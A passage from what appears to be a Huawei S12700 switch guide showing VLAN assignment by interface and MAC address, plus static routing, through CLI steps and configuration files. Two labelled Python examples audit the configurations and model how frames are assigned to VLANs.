[SW3] interface gigabitethernet 1/0/1
[SW3-GigabitEthernet1/0/1] port link-type access
[SW3-GigabitEthernet1/0/1] port default vlan 5 //Configure SW3 and SW1 to
communicate in untagged mode.
[SW3-GigabitEthernet1/0/1] quit
[SW3] interface vlanif 5 //Create VLANIF 5.
[SW3-Vlanif5] ip address 192.168.5.3 24 //Configure an IP address for VLANIF 5.
The IP address is the IP address of the interconnected interface between SW3 and SW1.
[SW3-Vlanif5] quit
[SW3] ip route-static 0.0.0.0 0.0.0.0 192.168.5.1 //Configure a default route so
that the PC can access the router. The next hop address is the IP address of the
interface connected to SW1.

Step 3 Configure SW1.

# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SW1 //Change the device name to SW1.
[SW1] vlan batch 5 //Create VLAN 5.

# Add the interfaces connected to the router, SW2, and SW3 to VLAN 5.
[SW1] interface gigabitethernet 1/0/1
[SW1-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to the router as the access interface.
[SW1-GigabitEthernet1/0/1] port default vlan 5
[SW1-GigabitEthernet1/0/1] quit
[SW1] interface gigabitethernet 1/0/2
[SW1-GigabitEthernet1/0/2] port link-type access //Configure the interface
connected to SW2 as the access interface.
[SW1-GigabitEthernet1/0/2] port default vlan 5
[SW1-GigabitEthernet1/0/2] quit
[SW1] interface gigabitethernet 1/0/3
[SW1-GigabitEthernet1/0/3] port link-type access //Configure the interface
connected to SW3 as the access interface.
[SW1-GigabitEthernet1/0/3] port default vlan 5
[SW1-GigabitEthernet1/0/3] quit

# Configure VLANIF interfaces so that PCs can connect to the router.
[SW1] interface vlanif 5 //Create VLANIF 5.
[SW1-Vlanif5] ip address 192.168.5.1 24 //Configure an IP address for VLANIF 5.
The IP address is the IP address of the interface connected to the router.
[SW1-Vlanif5] quit


# Configure a static route so that PCs on different network segments can communicate with
each other.
[SW1] ip route-static 192.168.2.0 255.255.255.0 192.168.5.2 //Configure a static
route. Packets with the destination IP address of 192.168.2.0/24 are forwarded to
the next hop address of 192.168.5.2. The next hop address is the IP address of
the VLANIF interface connected to SW2.
[SW1] ip route-static 192.168.3.0 255.255.255.0 192.168.5.2 //Configure a static
route. Packets with the destination IP address of 192.168.3.0/24 are forwarded to
the next hop address of 192.168.5.2. The next hop address is the IP address of
the VLANIF interface connected to SW2.
[SW1] ip route-static 192.168.4.0 255.255.255.0 192.168.5.3 //Configure a static
route. Packets with the destination IP address of 192.168.4.0/24 are forwarded to
the next hop address of 192.168.5.3. The next hop address is the IP address of
the VLANIF interface connected to SW3.

# Configure a default route so that PCs can communicate with the router.
[SW1] ip route-static 0.0.0.0 0.0.0.0 192.168.5.4 //Configure a default route. The
next hop address 192.168.5.4 is the IP address of the router interface connected to
SW1.

Step 4 Verify the configuration.
PC1, PC2, and PC3 can access each other, and they can communicate with the router.

----End

Configuration Files
Configuration file of SW1
#
sysname SW1
#
vlan batch 5
#
interface Vlanif5
ip address 192.168.5.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 5
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 5
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 5
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.4
ip route-static 192.168.2.0 255.255.255.0 192.168.5.2
ip route-static 192.168.3.0 255.255.255.0 192.168.5.2
ip route-static 192.168.4.0 255.255.255.0 192.168.5.3
#
return

Configuration file of SW2
#
sysname SW2
#
vlan batch 2 to 3 5
#
interface Vlanif2
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif3
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 5
#
interface GigabitEthernet1/0/23
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/24
port link-type access
port default vlan 3
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.1
#
return

Configuration file of SW3
#
sysname SW3
#
vlan batch 4 to 5
#
interface Vlanif4
ip address 192.168.4.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.3 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 5
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 4
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.1
#
return

6.3.3 Example for Configuring Interface-based VLAN Assignment (Aggregation Device Used as the Gateway)

Overview
VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Interface-based VLAN assignment is
the simplest and most commonly used mode.

In interface-based VLAN assignment, the VLAN of a frame is determined by the interface on
which it arrives. A network administrator preconfigures a PVID for each interface on a switch.
When an untagged frame arrives at an interface, the switch adds the PVID of the interface to
the frame. The frame is then transmitted in the VLAN specified by the PVID.

In typical hierarchical networking, when the access switch is a Layer 2 switch, the
aggregation switch can be used as the gateway of PCs. The configuration of the access switch
is simplified, and PCs access the external network through one outbound interface, thereby
facilitating maintenance and management.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-10, PC1 and PC2 belong to VLAN 2 and VLAN 3, respectively. PC1
and PC2 connect to the aggregation switch SW1 through the access switch SW2. PC3 belongs
to VLAN 4 and connects to SW1 through SW3. No configuration is performed on SW3, which
functions as a plug-and-play hub. SW1 functions as the gateway of PC1, PC2, and PC3 so that
the PCs can communicate with each other and with the router.

Figure 6-10 Configuring the aggregation device as the gateway

(Figure: topology recovered from the diagram text.)
l SW1 is the gateway of the PCs. SW1 GE1/0/1 connects to the router, SW1 GE1/0/2 connects to SW2 GE1/0/1, and SW1 GE1/0/3 connects to SW3.
l PC1: SW2 GE1/0/23, VLAN 2, IP address 192.168.2.2/24, gateway address 192.168.2.1
l PC2: SW2 GE1/0/24, VLAN 3, IP address 192.168.3.2/24, gateway address 192.168.3.1
l PC3: connected through SW3, VLAN 4, IP address 192.168.4.2/24, gateway address 192.168.4.1

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure interface-based VLAN assignment on the access switch to implement Layer 2
interworking.
2. Configure the aggregation switch as the gateway of PCs to implement Layer 3
interworking between PCs on different network segments.
3. Configure the interface connecting the aggregation switch and router.

Procedure
Step 1 Configure SW2.
# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SW2 //Change the device name to SW2 for easy identification.
[SW2] vlan batch 2 3 //Create VLAN 2 and VLAN 3 in a batch.

# Add interfaces to VLANs.
[SW2] interface gigabitethernet 1/0/23
[SW2-GigabitEthernet1/0/23] port link-type access //Configure the interface
connected to the PC as the access interface.
[SW2-GigabitEthernet1/0/23] port default vlan 2 //Add PC1 to VLAN 2.
[SW2-GigabitEthernet1/0/23] quit
[SW2] interface gigabitethernet 1/0/24
[SW2-GigabitEthernet1/0/24] port link-type access
[SW2-GigabitEthernet1/0/24] port default vlan 3 //Add PC2 to VLAN 3.
[SW2-GigabitEthernet1/0/24] quit
[SW2] interface gigabitethernet 1/0/1
[SW2-GigabitEthernet1/0/1] port link-type trunk //Configure the interface
connected to the aggregation switch as the trunk interface.
[SW2-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 3 //Add the interface to
VLAN 2 and VLAN 3.
[SW2-GigabitEthernet1/0/1] quit

Step 2 Configure SW1.
# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SW1 //Change the device name to SW1.
[SW1] vlan batch 2 to 5 //Create VLANs 2 to 5.

# Add the interfaces connected to SW2 and SW3 to VLANs.
[SW1] interface gigabitethernet 1/0/2
[SW1-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to SW2 as the trunk interface.
[SW1-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3 //Add the interface to
VLAN 2 and VLAN 3.
[SW1-GigabitEthernet1/0/2] quit
[SW1] interface gigabitethernet 1/0/3
[SW1-GigabitEthernet1/0/3] port link-type access //Configure the interface
connected to SW3, and through SW3 to PC3, as the access interface.
[SW1-GigabitEthernet1/0/3] port default vlan 4 //Add PC3 to VLAN 4.
[SW1-GigabitEthernet1/0/3] quit

# Configure VLANIF interfaces and configure IP addresses for VLANIF interfaces as
gateway addresses of PCs.
[SW1] interface vlanif 2 //Create VLANIF 2.
[SW1-Vlanif2] ip address 192.168.2.1 24 //Configure an IP address for VLANIF 2.
The IP address is the gateway address of PC1.
[SW1-Vlanif2] quit
[SW1] interface vlanif 3 //Create VLANIF 3.
[SW1-Vlanif3] ip address 192.168.3.1 24 //Configure an IP address for VLANIF 3.
The IP address is the gateway address of PC2.
[SW1-Vlanif3] quit
[SW1] interface vlanif 4 //Create VLANIF 4.
[SW1-Vlanif4] ip address 192.168.4.1 24 //Configure an IP address for VLANIF 4.
The IP address is the gateway address of PC3.
[SW1-Vlanif4] quit

# Add the interface connected to the router to a VLAN.
[SW1] interface gigabitethernet 1/0/1
[SW1-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to the router as the access interface. The interface communicates with
the router in untagged mode.
[SW1-GigabitEthernet1/0/1] port default vlan 5 //Add the interface connected to
the router to VLAN 5.
[SW1-GigabitEthernet1/0/1] quit

# Configure VLANIF interfaces so that PCs can connect to the router.
[SW1] interface vlanif 5 //Create VLANIF 5.
[SW1-Vlanif5] ip address 192.168.5.1 24 //Configure an IP address for VLANIF 5.
The IP address is used for interconnection with the router.
[SW1-Vlanif5] quit

Step 3 Verify the configuration.

PC1, PC2, and PC3 can access each other, and they can communicate with the router.

----End

Configuration Files
Configuration file of SW1
#
sysname SW1
#
vlan batch 2 to 5
#
interface Vlanif2
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif3
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif4
ip address 192.168.4.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 5
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 4
#
return

Configuration file of SW2
#
sysname SW2
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
interface GigabitEthernet1/0/23
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/24
port link-type access
port default vlan 3
#
return
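As an added example (not Huawei code and not part of this document), the following Python script parses the configuration-file format shown in the listings of 6.3.2 and 6.3.3 and checks that every VLAN an interface or VLANIF refers to was actually created, and that both ends of the SW1 GE1/0/2 to SW2 GE1/0/1 trunk link (pairing taken from Figure 6-10) allow the same VLANs. The SW2 file is copied from the listing above; the SW1 file is abridged to three of its blocks.

```python
"""Consistency audit for the VRP-style configuration files listed above.
Added example, not Huawei code: it parses the configuration-file subset used on
this page and reports VLANs that an interface or VLANIF refers to but that
"vlan batch" never created, plus trunk links whose two ends allow different VLANs.
Samples: the SW2 file of 6.3.3 verbatim, the SW1 file abridged to three blocks."""

SW1_CONFIG = """\
#
sysname SW1
#
vlan batch 2 to 5
#
interface Vlanif5
 ip address 192.168.5.1 255.255.255.0
#
interface GigabitEthernet1/0/1
 port link-type access
 port default vlan 5
#
interface GigabitEthernet1/0/2
 port link-type trunk
 port trunk allow-pass vlan 2 to 3
#
return
"""

SW2_CONFIG = """\
#
sysname SW2
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
 port link-type trunk
 port trunk allow-pass vlan 2 to 3
#
interface GigabitEthernet1/0/23
 port link-type access
 port default vlan 2
#
interface GigabitEthernet1/0/24
 port link-type access
 port default vlan 3
#
return
"""


def parse_vlan_list(spec):
    """'2 to 3 5' -> {2, 3, 5}: the 'a to b' range form used by vlan batch and allow-pass."""
    tokens, vlans, i = spec.split(), set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def parse_config(text):
    """Return the sysname, the set of created VLANs and the VLAN use of each interface."""
    cfg = {"sysname": None, "vlans": set(), "interfaces": {}}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("#", "return"):     # '#' ends a configuration block
            current = None
        elif line.startswith("sysname "):
            cfg["sysname"] = line.split(None, 1)[1]
        elif line.startswith("vlan batch "):
            cfg["vlans"] |= parse_vlan_list(line[len("vlan batch "):])
        elif line.startswith("interface "):
            name = line.split(None, 1)[1]
            current = cfg["interfaces"].setdefault(name, {"pvid": None, "allow": set()})
            if name.startswith("Vlanif"):            # VLANIF N needs VLAN N to exist
                current["vlanif"] = int(name[len("Vlanif"):])
        elif current is not None:
            if line.startswith("port default vlan "):              # access-port PVID
                current["pvid"] = int(line.split()[-1])
            elif line.startswith(("port trunk allow-pass vlan ", "port hybrid untagged vlan ")):
                current["allow"] |= parse_vlan_list(line.split("vlan ", 1)[1])
    return cfg


def audit(cfg):
    """List every reference to a VLAN that this configuration never created."""
    findings, created, host = [], cfg["vlans"], cfg["sysname"]
    for name, itf in cfg["interfaces"].items():
        if itf["pvid"] is not None and itf["pvid"] not in created:
            findings.append(f"{host} {name}: PVID {itf['pvid']} not created")
        for vid in sorted(itf["allow"] - created):
            findings.append(f"{host} {name}: allowed VLAN {vid} not created")
        if "vlanif" in itf and itf["vlanif"] not in created:
            findings.append(f"{host} {name}: VLAN {itf['vlanif']} not created")
    return findings


def trunk_mismatch(cfg_a, itf_a, cfg_b, itf_b):
    """VLANs allowed on only one end of a trunk link (the link pairing comes from the figure)."""
    return cfg_a["interfaces"][itf_a]["allow"] ^ cfg_b["interfaces"][itf_b]["allow"]
```

For the page's files audit() returns an empty list on both switches and trunk_mismatch() returns an empty set; removing VLAN 3 from SW2's vlan batch makes the audit flag both the trunk and the GE1/0/24 access port.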


6.3.4 Example for Configuring MAC Address-based VLAN Assignment
Overview of MAC Address-based VLAN Assignment
MAC address-based VLAN assignment applies to small-scale networks where user terminals
often change physical locations but their NICs seldom change, for example, mobile
computers.
VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Table 6-3 compares different VLAN
assignment modes.

Table 6-3 Comparisons among VLAN assignment modes

Interface-based VLAN assignment
Implementation: VLANs are assigned based on interfaces. A network administrator preconfigures a PVID for each interface on a switch. When an untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame. The frame is then transmitted in the VLAN specified by the PVID.
Advantage: It is simple to define VLAN members.
Disadvantage: The network administrator needs to reconfigure VLANs when VLAN members change.
Usage Scenario: Applies to networks of any scale and with devices at fixed locations.

MAC address-based VLAN assignment
Implementation: VLANs are assigned based on source MAC addresses of frames. A network administrator preconfigures mappings between MAC addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the MAC address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage: When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users. This improves security and access flexibility on a network.
Disadvantage: The network administrator must predefine VLANs for all members on a network.
Usage Scenario: Applies to small-scale networks where user terminals often change physical locations but their NICs seldom change, for example, mobile computers.

IP subnet-based VLAN assignment
Implementation: VLANs are assigned based on source IP addresses and subnet masks. A network administrator preconfigures mappings between IP addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the IP address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage:
l When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users.
l This mode reduces communication traffic and allows a broadcast domain to span multiple switches.
Disadvantage: Users are distributed regularly and multiple users are on the same network segment.
Usage Scenario: Applies to scenarios where there are high requirements for mobility and simplified management and low requirements for security. For example, this mode can be used if a PC with multiple IP addresses needs to access servers on different network segments or a PC needs to join a new VLAN automatically after the PC's IP address changes.

Protocol-based VLAN assignment
Implementation: VLANs are assigned based on protocol (suite) types and encapsulation formats of frames. A network administrator preconfigures mappings between protocol types and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the protocol type of the frame to the frame. The frame is then transmitted in the specified VLAN.
Advantage: This mode binds service types to VLANs, facilitating management and maintenance.
Disadvantage:
l The network administrator must preconfigure mappings between all protocol types and VLAN IDs.
l The switch needs to analyze protocol address formats and convert the formats, which consumes excessive resources. Therefore, this mode slows down switch response time.
Usage Scenario: Applies to networks using multiple protocols.

Policy-based VLAN assignment (MAC addresses, IP addresses, and interfaces)
Implementation: VLANs are assigned based on policies such as combinations of interfaces, MAC addresses, and IP addresses. A network administrator preconfigures policies. When receiving an untagged frame that matches a configured policy, the switch adds a specified VLAN tag to the frame. The frame is then transmitted in the specified VLAN.
Advantage:
l This mode provides high security. MAC addresses or IP addresses of users that have been bound to VLANs cannot be changed.
l The network administrator can flexibly select which policies to use according to the management mode and requirements.
Disadvantage: Each policy needs to be manually configured.
Usage Scenario: Applies to complex networks.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-11, GE1/0/1 interfaces on SwitchA and SwitchB connect to two
conference rooms, respectively. Laptop1 and Laptop2 are portal computers used in the two
conference rooms. Laptop1 and Laptop2 are portable computers used in the two
conference rooms. Laptop1 and Laptop2 belong to two departments, which belong to VLAN
100 and VLAN 200, respectively. Regardless of which conference room Laptop1 and Laptop2
are used in, Laptop1 and Laptop2 are required to access the servers of their respective
departments (Server1 and Server2, respectively). The MAC addresses of Laptop1 and Laptop2
are 0001-00ef-00c0 and 0001-00ef-00c1, respectively.


Figure 6-11 Networking of MAC address-based VLAN assignment

(Figure: topology recovered from the diagram text.)
l Server1 (VLAN 100) and Server2 (VLAN 200) connect to GE1/0/1 and GE1/0/2 of the Switch.
l Switch GE1/0/3 connects to SwitchA GE1/0/2, and Switch GE1/0/4 connects to SwitchB GE1/0/2.
l Laptop1 connects to SwitchA GE1/0/1, and Laptop2 connects to SwitchB GE1/0/1.

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs on SwitchA and SwitchB and add interfaces to VLANs to implement
Layer 2 connectivity.
2. Configure MAC address-based VLAN assignment on SwitchA and SwitchB.
3. Configure transparent transmission of VLAN tagged-packets on the switch so that
Laptop1 and Laptop2 can access Server1 and Server2 of their respective departments.

Procedure
Step 1 Configure SwitchA. The configuration of SwitchB is similar to the configuration of SwitchA
and is not described here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200 //Create VLAN 100 and VLAN 200.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk //The link type of
interfaces connecting switches must be trunk. The default link type of an
interface is not trunk, so you need to manually configure the trunk interface.
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 200 //Add GE1/0/2
to VLAN 100 and VLAN 200.
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] vlan 100
[SwitchA-vlan100] mac-vlan mac-address 0001-00ef-00c0 //Packets with the MAC
address of 0001-00ef-00c0 are transmitted in VLAN 100.
[SwitchA-vlan100] quit
[SwitchA] vlan 200
[SwitchA-vlan200] mac-vlan mac-address 0001-00ef-00c1 //Packets with the MAC
address of 0001-00ef-00c1 are transmitted in VLAN 200.
[SwitchA-vlan200] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid //MAC address-based VLAN
assignment can only be enabled on hybrid interfaces. The default link type of an
interface is not hybrid, so you need to manually configure the hybrid interface.
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100 200 //Add the
interface to VLAN 100 and VLAN 200 in untagged mode.
[SwitchA-GigabitEthernet1/0/1] mac-vlan enable //Enable MAC address-based VLAN
assignment on the interface.
[SwitchA-GigabitEthernet1/0/1] quit

Step 2 Configure the Switch. The configurations of GE1/0/2, GE1/0/3, and GE1/0/4 are similar to
the configuration of GE1/0/1 and are not described here.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 100 200
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 200 //Add GE1/0/1
to VLAN 100 and VLAN 200.
[Switch-GigabitEthernet1/0/1] quit

Step 3 Verify the configuration.
# Run the display mac-vlan mac-address all command in any view to check the
configuration of MAC address-based VLAN assignment.
[SwitchA] display mac-vlan mac-address all
---------------------------------------------------
MAC Address MASK VLAN Priority
---------------------------------------------------
0001-00ef-00c0 ffff-ffff-ffff 100 0
0001-00ef-00c1 ffff-ffff-ffff 200 0

Total MAC VLAN address count: 2

----End
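As an added example (not Huawei code and not part of this document), the following Python model reproduces the ingress decisions described in Table 6-3 and in the SwitchA procedure above, and goes beyond it to the IP subnet-based mode of 6.3.5. Its assumptions, which the page does not state, are that MAC address mappings are tried before IP subnet mappings, that a trunk or hybrid interface belongs to VLAN 1 by default, and the subnet-to-VLAN mappings constructed for the three hosts of Figure 6-12.

```python
"""Ingress VLAN classification under the assignment modes of Table 6-3.

Added example, not Huawei code.  It models how an incoming frame is assigned
to a VLAN: untagged frames get the PVID unless MAC address-based or IP
subnet-based assignment maps them elsewhere; tagged frames pass only on
interfaces that belong to the tagged VLAN.  Assumptions of this model (not
stated on the page): MAC mappings are tried before IP subnet mappings, a
trunk or hybrid interface belongs to VLAN 1 by default, and the IP subnet to
VLAN mappings for the 6.3.5 hosts are constructed from the figure addresses.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Interface:
    name: str
    link_type: str                       # "access", "trunk" or "hybrid"
    pvid: int = 1                        # VLAN given to untagged frames by default
    allow: set = field(default_factory=lambda: {1})   # allow-pass / hybrid VLANs
    mac_vlan_enable: bool = False        # "mac-vlan enable" on the interface
    ip_subnet_vlan_enable: bool = False  # "ip-subnet-vlan enable" on the interface


@dataclass
class Switch:
    mac_vlan: dict = field(default_factory=dict)        # "0001-00ef-00c0" -> 100
    ip_subnet_vlan: dict = field(default_factory=dict)  # "192.168.1.0/24" -> 100


def normalize_mac(mac):
    """Return the VRP form xxxx-xxxx-xxxx for 0001-00ef-00c0 or 00:01:00:ef:00:c0."""
    digits = mac.lower().replace("-", "").replace(":", "").replace(".", "")
    if len(digits) != 12 or any(c not in "0123456789abcdef" for c in digits):
        raise ValueError(f"bad MAC address: {mac!r}")
    return "-".join(digits[i:i + 4] for i in (0, 4, 8))


def _accepted(itf, vid):
    """Forward in vid only if the interface belongs to that VLAN, else drop (None)."""
    allowed = {itf.pvid} if itf.link_type == "access" else itf.allow
    return vid if vid in allowed else None


def classify(switch, itf, src_mac, src_ip=None, tag=None):
    """VLAN ID the frame is forwarded in, or None if the interface drops it.

    tag is the 802.1Q VLAN ID of a tagged frame; None means the frame is untagged."""
    if tag is not None:
        return _accepted(itf, tag)
    # Untagged frame: MAC address-based assignment first (Table 6-3, row 2) ...
    if itf.mac_vlan_enable:
        vid = switch.mac_vlan.get(normalize_mac(src_mac))
        if vid is not None:
            return _accepted(itf, vid)
    # ... then IP subnet-based assignment (row 3), longest matching prefix wins ...
    if itf.ip_subnet_vlan_enable and src_ip is not None:
        addr, best = ipaddress.ip_address(src_ip), None
        for subnet, vid in switch.ip_subnet_vlan.items():
            net = ipaddress.ip_network(subnet)
            if addr in net and (best is None or net.prefixlen > best[0]):
                best = (net.prefixlen, vid)
        if best is not None:
            return _accepted(itf, best[1])
    # ... otherwise interface-based assignment (row 1): the PVID.
    return _accepted(itf, itf.pvid)


# SwitchA of 6.3.4: GE1/0/1 hybrid, untagged in VLAN 100 and 200, mac-vlan enable.
SWITCH_A = Switch(mac_vlan={"0001-00ef-00c0": 100, "0001-00ef-00c1": 200})
SWITCH_A_GE1 = Interface("GigabitEthernet1/0/1", "hybrid", allow={1, 100, 200},
                         mac_vlan_enable=True)
SWITCH_A_GE2 = Interface("GigabitEthernet1/0/2", "trunk", allow={1, 100, 200})

# Switch of 6.3.5, with constructed subnet mappings for the figure's three hosts.
SWITCH_SUBNET = Switch(ip_subnet_vlan={"192.168.1.0/24": 100,
                                       "192.168.2.0/24": 200,
                                       "192.168.3.0/24": 300})
SWITCH_SUBNET_GE1 = Interface("GigabitEthernet1/0/1", "hybrid",
                              allow={1, 100, 200, 300}, ip_subnet_vlan_enable=True)
```

With these objects, Laptop1's frames on SwitchA GE1/0/1 are placed in VLAN 100 and Laptop2's in VLAN 200, an unmapped MAC address falls back to the PVID, and a tagged frame for a VLAN that the trunk does not allow is dropped.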

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 100 200
mac-vlan enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 200
#
vlan 100
mac-vlan mac-address 0001-00ef-00c0 priority 0
vlan 200
mac-vlan mac-address 0001-00ef-00c1 priority 0
#
return

Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 100 200
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 100 200
mac-vlan enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 200
#
vlan 100
mac-vlan mac-address 0001-00ef-00c0 priority 0
vlan 200
mac-vlan mac-address 0001-00ef-00c1 priority 0
#
return

Configuration file of the switch
#
sysname Switch
#
vlan batch 100 200
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 200
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 100 200
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 100 200
#
return

6.3.5 Example for Configuring IP Subnet-based VLAN Assignment
Overview of IP Subnet-based VLAN Assignment
IP subnet-based VLAN assignment applies to scenarios where there are high requirements for
mobility and simplified management and low requirements for security. For example, this
mode can be used if a PC with multiple IP addresses needs to access servers on different
network segments or a PC needs to join a new VLAN automatically after the PC's IP address
changes.
VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Table 6-4 compares different VLAN
assignment modes.


Table 6-4 Comparisons among VLAN assignment modes

Interface-based VLAN assignment
Implementation: VLANs are assigned based on interfaces. A network administrator preconfigures a PVID for each interface on a switch. When an untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame. The frame is then transmitted in the VLAN specified by the PVID.
Advantage: It is simple to define VLAN members.
Disadvantage: The network administrator needs to reconfigure VLANs when VLAN members change.
Usage Scenario: Applies to networks of any scale and with devices at fixed locations.

MAC address-based VLAN assignment
Implementation: VLANs are assigned based on source MAC addresses of frames. A network administrator preconfigures mappings between MAC addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the MAC address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage: When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users. This improves security and access flexibility on a network.
Disadvantage: The network administrator must predefine VLANs for all members on a network.
Usage Scenario: Applies to small-scale networks where user terminals often change physical locations but their NICs seldom change, for example, mobile computers.

IP subnet-based VLAN assignment
Implementation: VLANs are assigned based on source IP addresses and subnet masks. A network administrator preconfigures mappings between IP addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the IP address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage:
l When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users.
l This mode reduces communication traffic and allows a broadcast domain to span multiple switches.
Disadvantage: Users are distributed regularly and multiple users are on the same network segment.
Usage Scenario: Applies to scenarios where there are high requirements for mobility and simplified management and low requirements for security. For example, this mode can be used if a PC with multiple IP addresses needs to access servers on different network segments or a PC needs to join a new VLAN automatically after the PC's IP address changes.

Protocol-based VLAN assignment
Implementation: VLANs are assigned based on protocol (suite) types and encapsulation formats of frames. A network administrator preconfigures mappings between protocol types and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the protocol type of the frame to the frame. The frame is then transmitted in the specified VLAN.
Advantage: This mode binds service types to VLANs, facilitating management and maintenance.
Disadvantage:
l The network administrator must preconfigure mappings between all protocol types and VLAN IDs.
l The switch needs to analyze protocol address formats and convert the formats, which consumes excessive resources. Therefore, this mode slows down switch response time.
Usage Scenario: Applies to networks using multiple protocols.

Policy-based VLAN assignment (MAC addresses, IP addresses, and interfaces)
Implementation: VLANs are assigned based on policies such as combinations of interfaces, MAC addresses, and IP addresses. A network administrator preconfigures policies. When receiving an untagged frame that matches a configured policy, the switch adds a specified VLAN tag to the frame. The frame is then transmitted in the specified VLAN.
Advantage:
l This mode provides high security. MAC addresses or IP addresses of users that have been bound to VLANs cannot be changed.
l The network administrator can flexibly select which policies to use according to the management mode and requirements.
Disadvantage: Each policy needs to be manually configured.
Usage Scenario: Applies to complex networks.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-12, an enterprise has multiple services, including IPTV, VoIP, and
Internet access. Each service uses a different IP subnet. To facilitate management, the
company requires that packets of the same service be transmitted in the same VLAN and
packets of different services in different VLANs. The switch receives packets of multiple
services such as data, IPTV, and voice services, and user devices of these services use IP
addresses on different IP subnets. The switch needs to assign VLANs to packets of different
services so that the router can transmit packets with different VLAN IDs to different servers.


Figure 6-12 Networking of IP subnet-based VLAN assignment
[Figure: IPTV server behind Router; Router GE1/0/1 connects to Switch GE1/0/2; Switch GE1/0/1 connects to a simplified Layer 2 switch serving a user host (192.168.1.2/24), a multimedia terminal (192.168.2.2/24), and a phone (192.168.3.2/24)]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and add interfaces to VLANs so that the interfaces allow the IP subnet-
based VLANs.
2. Enable IP subnet-based VLAN assignment and associate IP subnets with VLANs so that
the switch determines VLANs based on source IP addresses or network segments of
packets.

Procedure
Step 1 Create VLANs.
